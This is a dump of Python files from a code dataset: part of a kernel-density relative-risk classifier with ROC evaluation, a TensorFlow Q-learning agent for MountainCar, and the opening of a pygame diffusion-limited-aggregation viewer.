out_colour for i in inside_lst)):\n inside.append(out_colour)\n flag = 1\n continue # move onto next iteration\n \n # ----------------------------------------------------\n \n # ---------------------------------------------------\n # check if it's inside a contour of another contour => False\n # compare list to see if it's within list - if point is true for same index as second value in tuple in list of ti\n for i in conts_inside:\n for ii in range(len(inside_lst)): # if they are in at the same position\n if((i[1]==ii) and (inside_lst[ii]==in_colour)):\n inside.append(out_colour)\n flag = 1\n # ---------------------------------------------------\n \n # ---------------------------------------------------\n # check to see if it's inside a big contour but not a little one\n if(flag==0):\n inside.append(in_colour)\n # ---------------------------------------------------\n \n return inside\n\n\n\ndef plotCleanDB(set_of_contours, level_idx, faulty_data, normal_data, pos_or_neg,r,c):\n \n '''\n usage: plotCleanDB(contSet,1,f_X_test,n_X_test,'+',0,0)\n '''\n \n fig, ax = plt.subplots(1,2,squeeze=False,figsize=(13,5.5))\n \n # plot all db for the lvl\n for i in set_of_contours[level_idx]:\n ax[r][c].scatter(i[:,0],i[:,1],c='k',s=0.2)\n \n if(pos_or_neg=='+'): # +ve\n \n #faulty and normaal boolean arrays for the data\n faulty_clrs = pointInOrOut(faulty_data,set_of_contours,level_idx,'red','blue')\n normal_clrs = pointInOrOut(normal_data,set_of_contours,level_idx,'orange','purple')\n \n # plot color coded data\n ax[r][c].scatter(faulty_data[:,0], faulty_data[:,1], marker = 'x', s=50,\n c=faulty_clrs,\n linewidth=0.7)\n ax[r][c].scatter(normal_data[:,0], normal_data[:,1],marker = '^',\n facecolor=\"None\",\n s=20,edgecolors= normal_clrs,\n linewidths=0.5)\n \n\n \n else: # -ve\n #faulty and normaal boolean arrays for the data\n faulty_clrs = pointInOrOut(faulty_data,set_of_contours,level_idx,'blue','red') # colors switched\n normal_clrs = pointInOrOut(normal_data,set_of_contours,level_idx,'purple','orange')\n \n # plot color coded data\n ax[r][c].scatter(faulty_data[:,0], faulty_data[:,1], marker = 'x', s=50,\n c=faulty_clrs,\n linewidth=0.7)\n ax[r][c].scatter(normal_data[:,0], normal_data[:,1],marker = '^',\n facecolor=\"None\",\n s=20,edgecolors= normal_clrs,\n linewidths=0.5)\n \n\n \n # legend\n colors = ['red', 'blue']\n markers = [plt.scatter([], [], color=c, linewidth=0.8, marker='x') for c in colors]\n labels = ['TN: {0}'.format(faulty_clrs.count('red')),'FN: {0}'.format(faulty_clrs.count('blue'))]\n \n colors = ['purple', 'orange']\n [markers.append(plt.scatter([],[],marker='^',facecolor='None',s=25,edgecolor=c,linewidths=0.6)) for c in colors]\n labels.append('TP: {0}'.format(normal_clrs.count('purple')))\n labels.append('FP: {0}'.format(normal_clrs.count('orange')))\n \n ax[r][c].legend(markers,labels)\n \n # adjust subplot\n fig.subplots_adjust(left=None, bottom=None, right=None, top=0.8, wspace=None, hspace=None)\n \n #fig.savefig('/Users/thomasdrayton/Desktop/neg_threshold_db.png',format='png',dpi=250)\n \n#plotCleanDB(contSet,1,f_X_test,n_X_test,'+',0,0)\n#plotCleanDB(contSet,99,f_X_test,n_X_test,'-',0,1)\n \n \ndef plotAverageROC(list_of_folds):\n '''\n list_of_folds = df_folds\n \n e.g. 
plotAverageRPC(df_folds)\n \n '''\n all_tpr = []\n all_fpr = []\n \n # create new dataframe from df_folds\n for fold in df_folds:\n \n # extract FPR and TPR as array and add \n all_tpr.append(fold.TPR)\n all_fpr.append(fold.FPR)\n \n all_tpr = np.transpose(np.array(all_tpr,dtype=float))\n all_fpr = np.transpose(np.array(all_fpr,dtype=float))\n \n avg_tpr = []\n avg_fpr = []\n # calculate averages\n for i in range(all_tpr.shape[0]):\n avg_tpr.append(np.nanmean(all_tpr[i,:]))\n avg_fpr.append(np.nanmean(all_fpr[i,:]))\n \n # plot ROC\n plt.plot(avg_fpr, avg_tpr,c='k',s = 1)\n plt.plot(np.linspace(0,1),np.linspace(0,1),c='lightgrey')\n plt.title('ROC curve from {0} fold stratified cross validation'.format(len(df_folds)))\n plt.xlabel('FPR')\n plt.ylabel('TPR')\n\n\n\n\n\n\n\ndef plotAllFoldsROC(list_of_folds):\n \n fig, ax = plt.subplots()\n \n # calc average tpr and fpr from all folds --------------------\n all_tpr = []\n all_fpr = []\n aucs = []\n # create new dataframe from df_folds\n for fold in df_folds:\n \n # extract FPR and TPR as array and add \n all_tpr.append(np.array(fold.loc[:,'TPR'],dtype=float))\n all_fpr.append(np.array(fold.loc[:,'FPR'],dtype=float))\n# =============================================================================\n# all_tpr.append(interp(np.linspace(0,1,400), np.array(fold.loc[:,'FPR'],dtype=float), np.array(fold.loc[:,'TPR'],dtype=float)))\n# all_tpr[-1][0] = 0.0\n# roc_auc = auc(np.array(fold.loc[:,'FPR'],dtype=float), np.array(fold.loc[:,'TPR'],dtype=float))\n# aucs.append(roc_auc)\n# \n# mean_tpr = np.mean(all_tpr, axis=0)\n# mean_tpr[-1] = 1.0 # ignore\n# mean_auc = auc(np.linspace(0,1,400), mean_tpr)\n# std_auc = np.std(aucs)\n# plt.plot(np.linspace(0,1,400), mean_tpr, color='b',\n# label=r'Mean ROC (AUC = %0.2f $\\pm$ %0.2f)' % (mean_auc, std_auc),\n# lw=2, alpha=.8)\n# \n# std_tpr = np.std(all_tpr, axis=0)\n# tprs_upper = np.minimum(mean_tpr + std_tpr, 1)\n# tprs_lower = np.maximum(mean_tpr - std_tpr, 0)\n# plt.fill_between(np.linspace(0,1,400), tprs_lower, tprs_upper, color='grey', alpha=.2,\n# label=r'$\\pm$ 1 std. dev.')\n# =============================================================================\n \n \n #all_tpr = np.array(fold.loc[:,'TPR'],dtype=float)\n #all_fpr = np.array(fold.loc[:,'FPR'],dtype=float)\n \n avg_tpr = np.mean(all_tpr, axis=0)\n avg_fpr = np.mean(all_fpr, axis=0)\n \n \n\n #avg_tpr = []\n #avg_fpr = []\n # calculate averages \n #for i in range(all_tpr.shape[0]):\n # avg_tpr.append(np.nanmean(all_tpr[i,:]))\n # avg_fpr.append(np.nanmean(all_fpr[i,:]))\n\n #plot average\n ax.plot(np.sort(avg_fpr), np.sort(avg_tpr),c='k',lw=1.6,label='Mean: AUC={0:.2f}'.format(auc(avg_fpr[61:],avg_tpr[61:],reorder=True)))\n \n std_tpr = np.std(all_tpr, axis=0)\n std_fpr = np.std(all_fpr, axis=0)\n \n #tprs_upper = avg_tpr + std_tpr\n #fprs_upper = avg_fpr + std_fpr\n\n #tprs_lower = avg_tpr - std_tpr\n #fprs_lower = avg_fpr - std_fpr\n \n #plt.plot(fprs_lower,tprs_lower,ls='--')\n #plt.plot(fprs_upper,tprs_upper,ls='--')\n\n #plt.fill_between(avg_fpr, tprs_lower, tprs_upper, color='grey', alpha=.2,\n # label=r'$\\pm$ 1 std. 
dev.')\n # std deviation for TPR --------------------\n #print(all_tpr.shape)\n #std_tprs = []\n #std_fprs = []\n #for r in range(all_tpr.shape[0]):\n # std_tprs.append(np.std(all_tpr[r,:]))\n # std_fprs.append(np.std(all_fpr[r,:]))\n \n \n # std dev bounds -----------------------\n #upper_t = np.array(avg_tpr) + np.array(std_tprs) \n #lower_t = np.array(avg_tpr) - np.array(std_tprs) \n #upper_f = np.array(avg_fpr) + np.array(std_fprs)\n #lower_f = np.array(avg_fpr) - np.array(std_fprs)\n \n \n \n \n # plot bounds\n #plt.fill_between(avg_fpr, lower_t, upper_t, color='grey', alpha=.2,label=r'$\\pm$ 1 std. dev.')\n #plt.fill_between(avg_fpr, lower_f, upper_f, color='grey', alpha=.2)\n \n \n \n # plot each fold\n for i,fold in enumerate(list_of_folds):\n roc_auc = auc(np.array(fold.loc[:,'FPR'],dtype=float), np.array(fold.loc[:,'TPR'],dtype=float),reorder=True)\n ax.plot(np.sort(fold.FPR),np.sort(fold.TPR),lw=0.4,label = 'Fold {1}: AUC={0:.2f}'.format(roc_auc,i+1),ls='-')\n \n \n ax.plot(np.linspace(0,1),np.linspace(0,1),c='lightgrey')\n ax.set_xlabel(\"FPR\",fontsize=11)\n ax.set_ylabel(\"TPR\",fontsize=11)\n ax.legend(fontsize=11)\n fig.savefig('/Users/thomasdrayton/Desktop/roc_complete_fld_cv10.png',format='png',dpi=400)\n \n#%% \n\n#plotAllFoldsROC(df_folds)\n\n#fig.clear(all)\n# =============================================================================\n# #%% plotting each contour with a timer\n# contourPlot(xx,yy,log_rr,fold_count,'',data=None)\n# plotDB(contSet[1],n_X_test,f_X_test,l='+',pause_time=2)\n# #%%\n# contourPlot(xx,yy,log_rr,fold_count,'',data=None)\n# \n# #%%\n# contourPlot(xx,yy,zz_f,fold_count,data=f_X_train,'f_X_train')\n# contourPlot(xx,yy,zz_n,fold_count,data=n_X_train,'n_X_train')\n# #%%\n# surfacePlot(xx,yy,log_rr,fold_count)\n# =============================================================================\n#%% Data preparation\n\n# Data after running Fisher's Linear Discriminant for hand labels\nnormal = np.real(normal)\nfaulty = np.real(faulty)\n\n\n# Data after running PCA on hand labelled P curve\n#normal = norm.values\n#faulty = fnorm.values\n\n\n# prepare data for cross validation\nfld_data = np.vstack((normal,faulty))\nX = fld_data[:,[0,1]]\ny = fld_data[:,2]\n\n\n\n\n#%% Initialise parameters to suit data \n\n# Change mesh so it comrresponds to dimensions of data space\nxmesh = [-0.51,0.2,1000j] # MAKE SURE CORRECT BY LOOKING AT MIN AND MAX OF SUBSPACE AXES\nymesh = [-0.51,0.07,1000j]\n\n\n# Instantiate stratified kfold cross validation\nk = 5 # increase this to 10 fold to see any changes\ncv = StratifiedKFold(n_splits=k) \n\n# dataframe to store results for each fold\ndf_folds = []\n\n\nfold_count = 0\nfor train, test in cv.split(X, y):\n\n # Create current train and test data\n X_train = X[train,:]\n X_test = X[test,:]\n y_train = y[train]\n y_test = y[test]\n \n # faulty and normal data for training and testing for the current fold\n f_X_train = X_train[np.where(y_train==0),:][0]\n n_X_train = X_train[np.where(y_train==1),:][0]\n \n f_X_test = X_test[np.where(y_test==0),:][0]\n n_X_test = X_test[np.where(y_test==1),:][0]\n \n \n \n # Log-likelihood on training data --------------------------------------\n \n # bandwdith for faulty data\n fb = findKDEbandwidth(np.linspace(0, 0.09,200),f_X_train,'Faulty')\n \n # Perform kDE on faulty using using dimensions of plot\n xx, yy, zz_f = kde2D(f_X_train[:,0],\n f_X_train[:,1],\n bandwidth=fb.best_params_['bandwidth'],\n x_mesh=xmesh, \n y_mesh=ymesh)\n \n # Anything below 10^(-5) is 10^(-5)\n zz_f = 
levelKDE(zz_f)\n    \n    # bandwidth for normal data\n    fb = findKDEbandwidth(np.linspace(0.0, 0.055,50),n_X_train,'Normal') # need to tune bandwidth search range for different data\n    # for cv= 5, let np.linspace(0, 0.02,20) to speed up\n    # Perform KDE on normal data using dimensions of plot\n    xx, yy, zz_n = kde2D(n_X_train[:,0],\n                         n_X_train[:,1],\n                         bandwidth=fb.best_params_['bandwidth'],\n                         x_mesh=xmesh, \n                         y_mesh=ymesh)\n    \n    # Anything below 10^(-5) is 10^(-5)\n    zz_n = levelKDE(zz_n)\n    \n    \n    # Log likelihood of the relative risk\n    log_rr = np.log(zz_f/zz_n)\n    \n    \n    # plot\n    #contourPlot(xx,yy,log_rr,fold_count,'',data=None) # make it so that all plots are shown in a single figure\n    #surfacePlot(xx,yy,log_rr,fold_count)\n    \n    \n    #df_folds.append(evalutateThresholds(xx,yy,log_rr,\n    #                                    normal = n_X_test,\n    #                                    faulty = f_X_test,\n    #                                    k = fold_count+1))\n    \n    \n    # Evaluation--------------------------------------------------------------\n    \n    # All levels to iterate through: from -ve to +ve\n    #all_lvls = np.array([np.linspace(0.01,np.max(log_rr),100) ]) # positive levels\n    #all_lvls = np.array([np.linspace(np.min(log_rr),-0.001,100)]) # negative levels\n    all_lvls = np.array([np.linspace(np.min(log_rr),-0.001,100),np.linspace(0.001,np.max(log_rr),100) ])\n\n\n    # create df\n    cols = ['Level','Fold','TN','FN','TP','FP','FPR','TPR','Total','# of datapoints per test']\n    df_conM = pd.DataFrame(columns=cols)\n    \n    # iterate through -ve levels, then +ve levels\n    for lvls in all_lvls: \n        \n        \n        # creating contour object to access contour coords\n        CS = ax.contour(xx,yy,log_rr,levels=lvls)\n        \n        \n        # close the plot that is created\n        plt.close('all')\n        \n        # Contour Set: all contours from each level\n        contSet = CS.allsegs\n        #break # for debugging\n        \n        #if(fold_count==0):\n        #    break # for debugging\n        #fold_count+=1 # delete - just for debugging\n        #%%\n        # and each group of contours in that level\n        for lvl in range(len(contSet)):\n\n            TP = 0 # Reset true positives for current level [normal data]\n            FP = 0 # Reset false positives for current level [faulty data]\n            TN = 0 # Reset true negatives for current level [faulty data]\n            FN = 0 # Reset false negatives for current level [normal data]\n            \n            \n            # Are any of the contours inside each other? 
If so, which ones?\n            cont_num = range(len(contSet[lvl])) # number of contours -----------\n            conts_inside = [] # list for contours within each other. This could be a function that takes contSet[lvl] as input\n            for c in itertools.combinations(cont_num,2):\n                # check if contours are inside each other\n                contour1 = contSet[lvl][c[0]]\n                contour2 = contSet[lvl][c[1]]\n                #print(c)\n                path1 = mpltPath.Path(contour1)\n                path2 = mpltPath.Path(contour2)\n                \n                if(path1.contains_path(path2)):\n                    # path2 is inside path1\n                    conts_inside.append(c)\n                    \n                elif(path2.contains_path(path1)):\n                    # path1 is inside path2\n                    conts_inside.append(c) # ------------ \n            #break\n            #%%\n            \n            \n            for contour in range(len(contSet[lvl])): # goes through every contour at current level\n                \n                # reset flag so that points are not counted twice\n                flag = 0\n                \n                # list for encapsulating contours\n                encap_cont = []\n                \n                # Create a path for the current contour\n                path = mpltPath.Path(contSet[lvl][contour])\n                \n                # check if one contour is inside another\n                for i in conts_inside: # likely to be only 1 contour inside another, but a for loop is used just in case there is more than 1\n                    \n                    if(i[0]==contour): # check if the current contour is one that encapsulates other contours\n                        \n                        # set flag so that points are not counted again\n                        flag = 1\n                        \n                        # all points within add them [already got that code] ----------------------\n                        f_inside = [] # function that takes a TN,FN...,path and returns TN,FN... \n                        n_inside = []\n                        \n                        if((lvls[lvl] < 0) and not(i[0] in encap_cont)): # -ve levels\n                            # Check to see which normal points are within contour\n                            n_inside = path.contains_points(n_X_test)\n                            \n                            # Check to see which faulty points are within contour\n                            f_inside = path.contains_points(f_X_test)\n                            \n                            # number of normal points in contour\n                            TP += np.sum(n_inside)\n                            \n                            # number of faulty points in contour\n                            FP += np.sum(f_inside)\n                            #print('here1')\n                        \n                        \n                        \n                        elif((lvls[lvl] > 0) and not(i[0] in encap_cont)): # +ve levels\n                            \n                            # Check to see which faulty points are within contour\n                            f_inside = path.contains_points(f_X_test)\n                            \n                            # Check to see which normal points are within contour\n                            n_inside = path.contains_points(n_X_test)\n                            \n                            # number of faulty points in contour\n                            TN += np.sum(f_inside)\n                            \n                            # number of normal points in contour\n                            FN += np.sum(n_inside) # ---------------------- function returns TN,FN...\n                            #print('here2')\n                        \n                        # add contour number to list so that it's not added again\n                        encap_cont.append(i[0])\n                        \n                        # next iteration\n                        continue\n                    \n                    if(i[1]==contour): # check if inner contour is current contour\n                        # -----------------------\n                        # set flag so that points are not counted again\n                        flag = 1\n                        \n                        # values inside contour need to be subtracted; same function but subtracts\n                        if(lvls[lvl] < 0): # -ve levels\n                            # Check to see which normal points are within contour\n                            n_inside = path.contains_points(n_X_test)\n                            \n                            # Check to see which faulty points are within contour\n                            f_inside = path.contains_points(f_X_test)\n                            \n                            # number of normal points in contour\n                            TP -= np.sum(n_inside)\n                            \n                            # number of faulty points in contour\n                            FP -= np.sum(f_inside)\n                            #print('here1')\n                        \n                        \n                        \n                        elif(lvls[lvl] > 0): # +ve levels\n                            \n                            # Check to see which faulty points are within contour\n                            f_inside = path.contains_points(f_X_test)\n                            \n                            # Check to see which normal points are within contour\n                            n_inside = path.contains_points(n_X_test)\n                            \n                            # number of faulty points in contour\n                            TN -= np.sum(f_inside)\n                            \n                            # number of normal points in contour\n                            FN -= np.sum(n_inside) # function returns TN,FN...\n                            #print('here2') 
------------------------\n                        \n                \n                    # count points inside contour - same function as before\n                    # all points within add them [already got that code] ----------------------\n                    f_inside = [] # function that takes a TN,FN...,path and returns TN,FN... \n                    n_inside = []\n                    \n                    # if there are no inner contours (flag not set), count points here [flag is set if the contour has already been counted]\n                    if(flag==0):\n                        if(lvls[lvl] < 0): # -ve levels\n                            # Check to see which normal points are within contour\n                            n_inside = path.contains_points(n_X_test)\n                            \n                            # Check to see which faulty points are within contour\n                            f_inside = path.contains_points(f_X_test)\n                            \n                            # number of normal points in contour\n                            TP += np.sum(n_inside)\n                            \n                            # number of faulty points in contour\n                            FP += np.sum(f_inside)\n                            #print('here1')\n                        \n                        \n                        \n                        elif(lvls[lvl] > 0): # +ve levels\n                            \n                            # Check to see which faulty points are within contour \n                            f_inside = path.contains_points(f_X_test) \n                            \n                            # Check to see which normal points are within contour\n                            n_inside = path.contains_points(n_X_test)\n                            \n                            # number of faulty points in contour\n                            TN += np.sum(f_inside)\n                            \n                            # number of normal points in contour\n                            FN += np.sum(n_inside) # ---------------------- function returns TN,FN...\n                            #print('here2')\n                    \n                    \n                    # calculate points outside contours\n                    if(lvls[lvl] < 0): # -ve levels\n                        FN = n_X_test.shape[0] - TP # number of normal points outside contour\n                        TN = f_X_test.shape[0] - FP # number of faulty points outside contour\n                    elif(lvls[lvl] > 0): # +ve levels\n                        FP = f_X_test.shape[0] - TN # number of faulty points outside contour\n                        TP = n_X_test.shape[0] - FN # number of normal points outside contour\n                    \n                    # Add to dataframe\n                    df_conM.loc[lvls[lvl],'Level'] = lvl\n                    df_conM.loc[lvls[lvl],'Fold'] = fold_count\n                    df_conM.loc[lvls[lvl],'TN'] = TN\n                    df_conM.loc[lvls[lvl],'FN'] = FN\n                    df_conM.loc[lvls[lvl],'FP'] = FP\n                    df_conM.loc[lvls[lvl],'TP'] = TP\n                    df_conM.loc[lvls[lvl],'Total'] = TP+FP+TN+FN\n                    df_conM.loc[lvls[lvl],'# of datapoints per test'] = n_X_test.shape[0]+f_X_test.shape[0]\n\n                    # If ZeroDivisionError add NaN\n                    if(((FP==0) and (TN==0))):\n                        df_conM.loc[lvls[lvl],'FPR'] = np.nan\n                    else:\n                        df_conM.loc[lvls[lvl],'FPR'] = FP/np.sum([FP,TN])\n                    \n                    # If ZeroDivisionError add NaN\n                    if(((TP==0) and (FN==0))):\n                        df_conM.loc[lvls[lvl],'TPR'] = np.nan\n                    else:\n                        df_conM.loc[lvls[lvl],'TPR'] = TP/np.sum([TP,FN])\n                    \n                    #break # stop after first contour\n            #break # stop after first level\n        #break # stop after +/- level\n        df_folds.append(df_conM)\n        if(fold_count==0):break # stop after specified fold\n        \n        # increment fold count\n        fold_count+=1\n\n# concatenate dataframes\ndf_rr_results = pd.concat(df_folds)\n\n\n# Contour plot for ending fold that shows the train data too - alter by changing end break statement\n#contourPlot(xx,yy,log_rr,fold_count,'',data=None)\n#plt.scatter(f_X_train[:,0],f_X_train[:,1],marker='x',s=50,color='gold',linewidth=0.9) # faulty points\n#plt.scatter(n_X_train[:,0],n_X_train[:,1],marker='^',s=5,facecolor='None',edgecolors='darkblue',linewidths=0.2) # normal points\n\n\n#%% Plot ROC curves for each fold\n#plotAllFoldsROC(df_folds)\n\n\n#%% Average ROC from all folds\n#plotAverageROC(df_folds)\n\n\n#%% Plotting decision boundary at specified level_idx of current contSet variable\n#plotCleanDB(contSet,1,f_X_test,n_X_test,'+')\n\n\n#contourPlot(xx,yy,log_rr,fold_count,'',data=None) # make it so that all plots are shown in a single figure\n\n#surfacePlot(xx,yy,log_rr,fold_count)\n\n#animateSurface(xx,yy,log_rr,fold_count)\n\n    
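\n#%% (added sketch)\n# Minimal, self-contained illustration of the evaluation idea above: estimate\n# two 2-D densities, take the log relative risk, and count test points inside\n# a decision contour with matplotlib Path. This is a hedged toy, not the tuned\n# pipeline: the Gaussian clusters, the fixed 0.3 bandwidth, and all names\n# suffixed _demo are invented here, and sklearn's KernelDensity stands in for\n# this project's kde2D/findKDEbandwidth helpers. It reuses the file's existing\n# np, plt and mpltPath imports, and it ignores nested contours, which the\n# full loop above handles explicitly.\nfrom sklearn.neighbors import KernelDensity\n\nrng_demo = np.random.default_rng(0)\nn_demo = rng_demo.normal((0.0, 0.0), 0.5, size=(200, 2)) # stand-in 'normal' points\nf_demo = rng_demo.normal((1.5, 1.5), 0.5, size=(60, 2))  # stand-in 'faulty' points\n\ngx_demo, gy_demo = np.meshgrid(np.linspace(-2, 4, 100), np.linspace(-2, 4, 100))\ngrid_demo = np.c_[gx_demo.ravel(), gy_demo.ravel()]\n\ndef kde_on_grid_demo(data, bw=0.3):\n    # sklearn returns log-density; exponentiate back to a density surface\n    kde = KernelDensity(bandwidth=bw).fit(data)\n    return np.exp(kde.score_samples(grid_demo)).reshape(gx_demo.shape)\n\n# floor the densities (same role as levelKDE) before taking the log ratio\nzz_f_sketch = np.clip(kde_on_grid_demo(f_demo), 1e-5, None)\nzz_n_sketch = np.clip(kde_on_grid_demo(n_demo), 1e-5, None)\nlog_rr_demo = np.log(zz_f_sketch / zz_n_sketch)\n\n# one decision level: log relative risk = 0\nfig_demo, ax_demo = plt.subplots()\ncs_demo = ax_demo.contour(gx_demo, gy_demo, log_rr_demo, levels=[0.0])\nplt.close(fig_demo)\n\n# count 'faulty' test points landing inside any 0-level contour\ninside_demo = 0\nfor seg_demo in cs_demo.allsegs[0]:\n    inside_demo += np.sum(mpltPath.Path(seg_demo).contains_points(f_demo))\nprint('faulty demo points inside the log-RR > 0 region:', inside_demo)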
\n\n#%%\n\n#contourPlot(xx,yy,zz_f/zz_n,fold_count,'',data1=f_X_train,data2=n_X_train) # make it so that all plots are shown in a single figure\n#contourPlot(xx,yy,log_rr,fold_count,'',data1=f_X_train,data2=n_X_train) \n#%%\n#fig,ax = plt.subplots(1,2,squeeze=False,figsize=(12,5))\n#cf = ax[0][0].contourf(xx,yy,zz_f/zz_n,levels=15,cmap=cm.plasma) \n#ax[0][0].scatter(n_X_train[:,0], n_X_train[:,1], marker = 'o', s=20,edgecolor='black',linewidth=0.7,facecolor='None')\n#ax[0][0].scatter(f_X_train[:,0], f_X_train[:,1], marker = 'x', s=70,c='white',linewidth=1.5)\n#fig.colorbar(cf)\n#ax.set_title(\"Faulty/Normal Log-likelihood: Fold {0}\".format(fold_count+1))\n#ax[0][0].tick_params(axis='both',labelsize=12)\n#ax[0][1].tick_params(axis='both',labelsize=12)\n\n#%%\n#fig.savefig('/Users/thomasdrayton/Desktop/LR_vs_logLR.png',format='png',dpi=400)\n\n\n\n#%%\n\n# =============================================================================\n# \n# # Create some random data, I took this piece from here:\n# # http://matplotlib.org/mpl_examples/mplot3d/scatter3d_demo.py\n# def randrange(n, vmin, vmax):\n# return (vmax - vmin) * np.random.rand(n) + vmin\n# n = 100\n# xx = randrange(n, 23, 32)\n# yy = randrange(n, 0, 100)\n# zz = randrange(n, -50, -25)\n# \n# # Create a figure and a 3D Axes\n# fig = plt.figure()\n# ax = Axes3D(fig)\n# \n# # Create an init function and the animate functions.\n# # Both are explained in the tutorial. Since we are changing\n# # the the elevation and azimuth and no objects are really\n# # changed on the plot we don't have to return anything from\n# # the init and animate function. (return value is explained\n# # in the tutorial.\n# def init():\n# ax.scatter(xx, yy, zz, marker='o', s=20, c=\"goldenrod\", alpha=0.6)\n# return fig,\n# \n# def animate(i):\n# ax.view_init(elev=10., azim=i)\n# return fig,\n# \n# # Animate\n# anim = animation.FuncAnimation(fig, animate, init_func=init,\n# frames=360, interval=20, blit=True)\n# \n# anim.save('/Users/thomasdrayton/Desktop//basic_animation.mp4', fps=30, writer='ffmpeg')\n# =============================================================================\n\n\n#%%\n\n\ndef init():\n ax.plot_surface(xx,yy,log_rr,antialiased=False,\n cmap=cm.plasma,\n alpha=1)\n return fig,\n\n\ndef animate(i):\n ax.view_init(elev=30., azim=i)\n return fig,\n\n\n \nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\n\n# Animate\nanim = animation.FuncAnimation(fig, animate, init_func=init,\n frames=360, interval=20, blit=True)\n#%\nanim.save('/Users/thomasdrayton/Desktop//basic_animation_600.mp4', fps=30, dpi=600,bitrate=10000)\n \n","repo_name":"bittahbandit/FYP-Scripts","sub_path":"relative_risk_v2.py","file_name":"relative_risk_v2.py","file_ext":"py","file_size_in_byte":39144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2798871075","text":"from __future__ import print_function\nfrom __future__ import division\nfrom __future__ import absolute_import\n\nimport gym\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.python import debug as tf_debug\n\nkEpisode = 9000\nkEpsilon = 0.2\nkAlpha = 0.01\nkGammar = 1\n\n\nclass QNetwork:\n space_action = None\n q_label = None\n train_op = None\n q = None\n init = None\n loss = None\n g_v = None\n\n def __init__(self):\n self.space_action = tf.placeholder(dtype = tf.float32, shape=[None,6])\n self.q_label = tf.placeholder(dtype = tf.float32, shape=[None])\n self.create_net()\n self.init = tf.initialize_all_variables()\n\n\n def 
create_net(self):\n w1 = tf.get_variable(\"w1\", shape = [6,10], \n # initializer=tf.constant_initializer(0.0))\n initializer=tf.random_normal_initializer(stddev=1/60))\n b1 = tf.get_variable('b1', shape=[10], \n initializer=tf.constant_initializer(0.0))\n # w2 = tf.get_variable(\"w2\", shape=[10,10],\n # initializer=tf.random_normal_initializer())\n w3 = tf.get_variable(\"w3\", shape=[10,1],\n # initializer=tf.constant_initializer(0.0))\n initializer=tf.random_normal_initializer(stddev=1/10))\n b3 = tf.get_variable('b3', shape=[1], \n initializer=tf.constant_initializer(0.0))\n l1 = tf.nn.relu(tf.matmul(self.space_action, w1)+b1)\n # l1 = tf.matmul(self.space_action, w1)+b1\n # l2 = tf.nn.relu(tf.matmul(l1, w3))\n self.q = tf.matmul(l1, w3)+b3\n # self.q = tf.matmul([self.space_action], w3)+b3\n weight_norm = tf.reduce_sum(0.00001*tf.convert_to_tensor([\n tf.nn.l2_loss(i) for i in [\n tf.get_collection('w1'), \n tf.get_collection('w3')]]))\n self.loss = tf.reduce_mean(tf.square(self.q_label-self.q))+weight_norm\n \n opt= tf.train.AdamOptimizer(\n kAlpha)\n self.g_v = opt.compute_gradients(self.loss)\n self.train_op = opt.apply_gradients(self.g_v)\n\ndef buildFeature(space, action):\n feature = np.zeros(6)\n space_ = np.zeros(2)\n space_[0] = space[0]+0.5\n space_[1] = space[1]/0.07\n feature[action*2: action*2+2] = space_\n return feature\n\ndef Qvalue(space, action, qnet, session):\n feature = buildFeature(space, action)\n q_value = session.run([qnet.q], feed_dict={qnet.space_action: [feature]})\n return q_value\n\ndef epsilonGreedy(space, qnet, session):\n if np.random.uniform(0,1)< 1- kEpsilon:\n Qlist = []\n for a in range(0,3):\n feature = buildFeature(space, a)\n # print(feature)\n q_value = session.run([qnet.q], feed_dict={qnet.space_action: \n [feature]})\n Qlist.append(q_value)\n action=np.random.choice(np.flatnonzero(\n np.array(Qlist) == np.array(Qlist).max()))\n else:\n action = np.random.randint(low=0, high=3)\n return action\n\n# def updateW(space, action, delta, w):\n# feature = np.append(space, action)\n# # feature[1] = feature[1]/0.07\n# # feature[0] = feature[0]/1.2\n# return w + kAlpha*delta*feature\n\ndef main():\n # w = (np.random.random([5])-0.5)*20\n gym.envs.register(\n id='MountainCarMyEasyVersion-v0',\n entry_point='gym.envs.classic_control:MountainCarEnv',\n max_episode_steps=1000, # MountainCar-v0 uses 200\n # reward_threshold=-110.0,\n )\n env = gym.make('MountainCarMyEasyVersion-v0')\n # env = gym.make('MountainCar-v0')\n ExpBuffer = []\n schedule = 0\n qnet = QNetwork()\n with tf.Session() as sess:\n # sess = tf_debug.LocalCLIDebugWrapperSession(sess)\n # sess.add_tensor_filter(\"has_inf_or_nan\", tf_debug.has_inf_or_nan)\n sess.run([qnet.init])\n for eps in range(kEpisode):\n print('EPS %d:'%(eps))\n space = env.reset()\n count = 0\n while True:\n env.render()\n action = epsilonGreedy(space, qnet, sess)\n space_, reward, done, _ =env.step(action)\n ExpBuffer.append((space, action, reward, space_))\n schedule = schedule + 1\n if schedule==200:\n sample = np.random.permutation(range(200))\n sample_id = sample[0:64]\n feature = []\n q_label = [] \n for id_ in sample_id:\n space, action, reward, space_ = ExpBuffer[id_]\n Qlist=[]\n for a in range(0, 3):\n Qlist.append(Qvalue(space_, a, qnet, sess))\n if space_[0]>=0.5:\n q_label.append(reward)\n else:\n q_label.append(reward+kGammar*np.max(np.array(Qlist)))\n \n feature.append(buildFeature(space, action))\n # print(feature)\n _, loss_, q_ = sess.run([qnet.train_op, qnet.loss, qnet.q], 
feed_dict={qnet.space_action:\n np.array(feature), qnet.q_label: np.array(q_label)})\n print(loss_)\n # print(q_)\n schedule = 0\n space = space_\n count = count + 1\n if done:\n print(count)\n break\n\n\n\n\nif __name__=='__main__':\n main()","repo_name":"heiscsy/reinforcement_learning_ucl","sub_path":"FA/MountainCar/linear_sarsa.py","file_name":"linear_sarsa.py","file_ext":"py","file_size_in_byte":4811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5667842095","text":"from MyMaths import *\nimport math\nimport sys\nimport pygame\nimport time\nimport TimeTest\nimport random\n\n\npygame.init()\npygame.font.init()\nmyfont = pygame.font.SysFont('Comic Sans MS', 30)\n\nsize = [600, 600]\nscreen = pygame.display.set_mode(size)\npygame.display.set_caption(\"Diffusion Limited Aggregation Viewer\")\n\n\nwalker_color = (255, 255, 255)\nwalker_size = 4\n\n\ntree = []\ntry:\n # importing tree from file\n file = open(\"tree.txt\", \"r\")\n lines = file.readlines()\n file.close()\n\n for line in lines:\n coordinates = line.split(\" \")\n coordinates[1] = coordinates[1].replace(\"\\n\", \"\")\n pos = Vec2(int(float(coordinates[0])), int(float(coordinates[1])))\n tree.append(pos)\nexcept:\n pass\n\n\ndef 